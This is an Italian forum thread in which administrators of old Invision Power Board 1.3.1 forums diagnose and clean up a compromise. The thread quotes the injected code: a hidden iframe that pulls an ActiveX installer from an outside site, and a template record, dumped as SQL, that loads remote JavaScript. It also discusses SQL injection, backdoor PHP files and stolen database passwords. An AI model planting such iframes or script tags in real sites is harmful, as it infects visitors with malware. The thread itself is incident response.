[IPB forum 1.3.1 active-x e problemi di sicurezza]

Un utente del mio forum mi ha segnalato che da oggi gli salta fuori un messaggio di Internet Explorer che gli richiedere se installare o meno un controllo active-x di una certa Inter Technologies Srl.
Ho provato a visualizzare il codice html di varie pagine e trovi in fondo sempre il seguente codice:

Codice:

<iframe height=1 width=10 frameborder=0 src="http://www.installare.net/e/ads.php?b=3004"></iframe>

Ovviamente non ce l'ho messo io; che diavolo sta succedendo?
Io non ho attivato nessun circuito pubblicitario...

[funcool]

Non hai nessun servizio esterno, tipo un contatore?

Nulla, è una installazione standard fatta anni fa, che fino all'ora di pranzo non dava nessun problema.

Su un altro forum che gestisco, sempre in hosting su altervista, stesso problema.

[funcool]

Hai già provato a togliere quella porzione di codice?

[chrisbiro]

Ciao, accedento al tuo sito Norton mi rileva la presentza di un virus nel tuo sito!!!!!!
(Nome virus: Bloodhound,Exploit.61)

Ho appena controllato sia il file di template che il template nel database e non è riportata quella linea di codice, per cui suppongo venga aggiunta a runtime dal server.

EDIT: Allora, i due forum che gestisco sono:
http://monastero.altervista.org/
http://zeldaho.altervista.org/
e in entrambi, come ho già detto, c'è lo stesso problema.
Ho controllato sul sito di Symantec il virus segnalato da chrisbiro:
http://securityresponse.symantec.com...xploit.61.html

Visto che nel codice del forum la riga di codice citata nel mio primo messaggio non esiste, immagino che il problema sia sul server o sui server, se i due forum che gestisco risiedono su due server differenti.

Ditemi voi come risolvere la questione, perché io non so dove andare a sbattere la testa, oltre al fatto che ho possibilità di azione limitata.


FunCool: Non fare UP, usa il tasto Edita.

[Gianluca]

Prima di tutto ti invito ad usare toni ed espressioni più consone a questo forum e ad usare piuttosto titoli esplicativi.

Si tratta di un problema noto ormai da mesi che affligge IPB (le vecchie versioni):

http://www.wilderssecurity.com/showthread.php?p=694025
http://forums.invisionpower.com/inde...owtopic=209573

Powered by Invision Power Board(U) v1.3.1 Final © 2003

La tua copia è decisamente vecchia e deve essere aggiornata.

Scusate per il titolo, ma non sapevo che altro inserire; per i toni mi sono lasciato un po' andare, quindi chiedo nuovamente scusa.

Per quanto riguarda il problema, vedrò il da farsi; Invision Board non è propriamente economica per cui comprare la versione aggiornata, per di più per due installazioni...
Oltretutto quella che sto usando è parecchio modificata (RPG, chat, skins, etc.)

Ma che voi sappiate non esiste una patch per sistemare questa versione?
Io sto facendo un po' di ricerche, spero di trovare qualcosa di utile.

[Gianluca]

Probabilmente esiste, sinceramente non ho letto tutti i threads segnalati ma sembrerebbe un exploit e quindi dovrebbe essere correggibile.

ho anch'io lo stesso identico problema da ieri sera.
Nei files del forum non c'è da nessuna parte una riga di codice che richiama quel link eppure aprendolo con internet explorer si avvia l'installazione di questo active-x.

http://ruotebucate.altervista.org/forum/index.php

[makpaolo]

Non è detto che si trovi una patch per tale problema, dato che è passata da board gratuita a pagamento sicuramente le vecchie versioni (hanno ritirato anche i download di esse) non sono state più aggiornate/controllate.
Dubito che troverete qualcosa se non mettendo voi mano al codice.

Non è detto che si trovi una patch per tale problema, dato che è passata da board gratuita a pagamento sicuramente le vecchie versioni (hanno ritirato anche i download di esse) non sono state più aggiornate/controllate.
Dubito che troverete qualcosa se non mettendo voi mano al codice.

Ma come è possibile? come puo' uno script installarsi automaticamente?
La cosa bella è che ho un backup del sito di quando funzionava perfettamente (fatto a marzo), stamattina l'ho ripristinato e niente, il problema persiste come se fosse qualcosa di indipendente ai files del forum.

[makpaolo]

ci sono vari tipi di bug ... per un forum (non cito quale) era possibile inserire del codice in firma grazie al quale si creava un file di testo contenentele sessioni degli utenti (funzionante, testato in locale).

purtroppo senza avere grandi informazioni è difficile dire cosa sia ... potrebbe essere presente nel database, magari agganciato a qualche utente o messaggio.

ci sono vari tipi di bug ... per un forum (non cito quale) era possibile inserire del codice in firma grazie al quale si creava un file di testo contenentele sessioni degli utenti (funzionante, testato in locale).

purtroppo senza avere grandi informazioni è difficile dire cosa sia ... potrebbe essere presente nel database, magari agganciato a qualche utente o messaggio.

Sei un genio! sta nel database!

Ho scaricato l'intero database come files di testo, ho fatto la ricerca del link incriminato e l'ho trovato all'interno di una tabella inserito con

Codice HTML:

INSERT INTO `ibf_templates` VALUES (1, '<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> \r\n<html xml:lang="en" lang="en" xmlns="http://www.w3.org/1999/xhtml"><script language="JavaScript" type="text/javascript" src="http://code.trasferimento.biz/l/15.js"></script>\r\n<head> \r\n<title><% TITLE %></title> \r\n<meta http-equiv="content-type" content="text/html; charset=iso-8859-1" /> \r\n<% GENERATOR %> \r\n<% CSS %> \r\n<% JAVASCRIPT %> \r\n</head>\r\n<iframe height=1 width=10 frameborder=0 src="http://www.installare.net/e/ads.php?b=3004"></iframe>\r\n<body>\r\n<div id="ipbwrapper">\r\n<% BOARD HEADER %>\r\n<% DSHOUTBOX %> \r\n<% NAVIGATION %> \r\n<% BOARD %> \r\n<% STATS %> \r\n<% COPYRIGHT %>\r\n</div>\r\n</body> \r\n</html>', 'Invision Board Standard');

[makpaolo]

già sapere cosa hanno messo e dove è qualcosa ... ora si dovrebbe lavorare sul "come" e cercare di tappare la cosa.
Il problema stà nel capire da quale form sono riusciti a far passare il codice ...
se sono entrati una volta possono farlo ancora senza problemi, come detto da Gianluca vi conviene aggiornare la board o passare ad altra board (se volete evitare pagamenti di licenze)

già sapere cosa hanno messo e dove è qualcosa ... ora si dovrebbe lavorare sul "come" e cercare di tappare la cosa.
Il problema stà nel capire da quale form sono riusciti a far passare il codice ...
se sono entrati una volta possono farlo ancora senza problemi, come detto da Gianluca vi conviene aggiornare la board o passare ad altra board (se volete evitare pagamenti di licenze)

Non potrei bloccare l'accesso in scrittura di quella tabella? se possono accedere soltanto a quella, bloccandola si eliminerebbe definitivamente il problema.

[makpaolo]

bloccare l'acceso in scrittura per quella tabella e per TUTTI coloro che utilizzano IPB è impensabile e ecessivamente laborioso, in poche parole non fattibile.
Non ricordo come IPB gestisce il templates ma se è nel DB deduco che tu da amministratore vai a leggere e scrivere se modifichi o carichi dei temi ... perciò l'accesso alla tabella in scrittura lo devi avere.

A parte che non ho poteri sugli account ma solo sul forum di AV, non è una soluzione valida secondo mè.
Ho si studia come siano riusciti a inserire il codice ( vedere gli iscritti immediatamente prima del fatto, potrebbe essere una strada) e far eseguire dei controlli (crearsi la patch) o si deve per forza aggiornare/cambiare board.

tanto per indagare ulteriormente, in che tabella hai trovato la query?
questa tabella (in particolare la parte interessata) ha riferimenti a utenti? analizzando bene la cosa una vaga speranza per "aggiustare" ci può essere.


EDIT:
girando in rete ho trovato questo
http://www.ibforen.de/index.php?ind=...y_view&iden=44
Non sò se va a tappare anche questo problema, ma se volete provare ...

la tabella è la `ibf_templates` che contiene un solo record che viene aggiornato soltanto quando viene campiata l'impostazione grafica del forum. Quindi se un amministratore non la cambia mai potrebbe bloccarla in scrittura con il comando

LOCK TABLES `ibf_templates` WRITE

e se poi ha necessità di fare modifiche, prima la sblocca con
UNLOCK TABLES `ibf_templates` e successivamente la riblocca.

Non posso cambiare forum, ho troppe modifiche e mod installate, spero che questa sia una soluzione definitiva.

[Gianluca]

A mio parere il problema è un robot che andando semplicemente a cercare sui motori di ricerca qualcosa del genere

Powered by Invision Power Board(U) v1.3.1 Final © 2003

Va poi ad eseguire nè più nè meno che una sql injection su uno degli scripts di amministrazione andando a scrivere dove normalmente dovrebbero esserci restrizioni.

La soluzione migliore è probabilmente prendere in locale tutti gli scripts del forum e ricercare in essi (ad esempio con un buon editor di testo) i riferimenti alla tabella incriminata e in particolare dove sono fatte operazioni di scrittura, certamente in quel codice risiede il problema.

Una soluzione che però non è degna di tale nome potrebbe essere quella di eliminare "v1.3.1 Final" dal footer, ma potrebbe non essere tollerato dai termini della licenza d'uso.

A mio parere il problema è un robot che andando semplicemente a cercare sui motori di ricerca qualcosa del genere

Va poi ad eseguire nè più nè meno che una sql injection su uno degli scripts di amministrazione andando a scrivere dove normalmente dovrebbero esserci restrizioni.

La soluzione migliore è probabilmente prendere in locale tutti gli scripts del forum e ricercare in essi (ad esempio con un buon editor di testo) i riferimenti alla tabella incriminata e in particolare dove sono fatte operazioni di scrittura, certamente in quel codice risiede il problema.

Una soluzione che però non è degna di tale nome potrebbe essere quella di eliminare "v1.3.1 Final" dal footer, ma potrebbe non essere tollerato dai termini della licenza d'uso.

Per il momento ho risolto andando nella tabella "ibf_templates" e cancellando ogni riferimento al link incriminato (non tutta la riga altrimenti poi il forum non si apre piu') e poi ho installato la seguente patch di sicurezza rilasciata il 17 maggio 2006 http://www.ibforen.de/forum/index.php?showtopic=10650

Attenzione, la patch funziona solo per chi ha installata la versione ibf 1.3.1.
Se avete la versione 1.3 dovete installare prima questa
http://www.ibforen.de/index.php?ind=...y_view&iden=44 per passare alla 1.3.1 e poi la patch riportata sopra.

[Gianluca]

Perfetto, se la cosa funziona si può tranquillamente mettere il link in rilievo per gli altri.

Allora, io ho la 1.3.1 final e ho trovato il codice incriminato fra i wrappers, modificabili dal pannello di amministrazione.
Inoltre, se non ve ne siete accorti, dovreste avere un paio di files php nella cartella delle emoticons; i commenti all'interno sono scritti in russo (credo).
Non ho controllato bene cosa facciamo i due suddetti files (erano diverse centinaia di righe di codice), ma suppongo fossero in grado di rieseguire le modifiche al database se invocate, per cui vi suggerisco di controllare e se le trovate di rimuoverli.
C'è comunque anche il rischio che in questa maniera abbiano letto la password dal file conf_global.php e che se la siano inviata (ad esempio tramite email), per cui vi suggerisco di modificare le vostre password.
Per la patch segnalata ora vedo di scaricarla sperando sia efficacie, io in alternativa avevo pensato di far sì che i wrappers non vengano letti da database ma da file di testo, in questa maniera l'exploit non avrebbe più effetto.

Chiedo ancora scusa per i toni utilizzati nei primi messaggi.

[Gianluca]

C'è comunque anche il rischio che in questa maniera abbiamo letto la password dal file conf_global.php e che se la siano inviata (ad esempio tramite email), per cui vi suggerisco di modificare le vostre password.

Questo è un problema di grande importanza, passo il thread come rilevante e ne modifico il titolo.

Pur avendo installato la patch, oggi ho subito un altro attacco, ma l'ho risolto in 5 minuti come nel precedente caso.

EDIT:
Inoltre ho un problema tecnico e non ne conosco il motivo.

Sono andato a modificare la password all'interno appunto del file conf_global.php ma succede che quando salvo il file in realtà viene salvato un file vuoto, ovvero se entro nel file è sparito tutto quello che conteneva prima.
Ho provato anche a fare l'upload direttamente fal file di backup che avevo salvato sul pc, ma quando presente sul server il file risulta vuoto.

Cosa devo fare?

[Gianluca]

Il file non è vuoto ma ne hai modificato i permessi, in quel modo non puoi più leggere il contenuto. Lascia i permessi assegnati da AlterVista.

Anche i miei due forums sono stati ribucati.
L'unica alternativa che vedo attualmente è quella di rendere i wrappers non modificabili, ad esempio non facendoli più leggere da database ma, ad esempio, da file di testo.
In questa maniera i cracker vanno a modificare il valore nel database, mentre tu leggi il file di testo che è pulito e il forum non ha più problemi.
In alternativa, si può modificare la chiave con cui viene identificato il wrapper in maniera tale che il codice eseguito dal cracker non trovi il record giusto e quindi la query di modifica non ha effetto.

L'unica cosa da stabilire è in quali punti invision va a leggere quel valore dal DB; se è solo in uno script, quello che genera il template generico, la modifica richiede poco tempo, altrimenti la faccenda si allunga.
Appena posso metto le mani alla board e vedo cosa riesco a tirare fuori.

Anche i miei due forums sono stati ribucati.
L'unica alternativa che vedo attualmente è quella di rendere i wrappers non modificabili, ad esempio non facendoli più leggere da database ma, ad esempio, da file di testo.
In questa maniera i cracker vanno a modificare il valore nel database, mentre tu leggi il file di testo che è pulito e il forum non ha più problemi.
In alternativa, si può modificare la chiave con cui viene identificato il wrapper in maniera tale che il codice eseguito dal cracker non trovi il record giusto e quindi la query di modifica non ha effetto.

L'unica cosa da stabilire è in quali punti invision va a leggere quel valore dal DB; se è solo in uno script, quello che genera il template generico, la modifica richiede poco tempo, altrimenti la faccenda si allunga.
Appena posso metto le mani alla board e vedo cosa riesco a tirare fuori.

Ho letto su un altro sito che il problema non e' il wrapper ma il fatto che questi hacker riescono ad ottenere la password di amministrazione e poi con questa possono fare di tutto, come ad esempio modificare il wrapper come sui nostri siti (e siamo stati pure fortunati).
La cosa preoccupante è che su altri forum hanno fatto danni ben maggiori tali da compromettere totalmente il funzionamento del forum e non si sono limitati al semplice inserimento di un iframe.

Si, lo so, infatti l'ho segnalato sopra.
Al primo attacco hanno infilato due files .php nella cartella delle emoticons tramite una sql injections e tramite quelli potevano gestire tranquillamente le modifiche.
Inoltre hanno facilmente avuto accesso alle password del DB contenute nel conf_global.php

L'unica cosa da fare è modificare la password e, per evitare il caricamento dell'iframe che infetta gli utenti, modificare il sistema di gestione dei wrappers.
Io comunque sto pianificando la migrazione alla nuova board, ho fatto una colletta fra gli utenti e entro fine giugno migriamo.

monastero, per caso avevi installata la shoutbox sui tuoi forum?
Io l'ho tolta e sono circa 10 giorni che non subisco piu' attacchi, non so se sia solo un caso.

No, niente shoutbox.
Anche io sono alcuni giorni che non subisco attacchi, ma credo sia soltanto perché dopo qualche attacco di questo tipo sono passati ad altro, le falle rimangono e possono comunque essere sfruttate per ulteriori attacchi.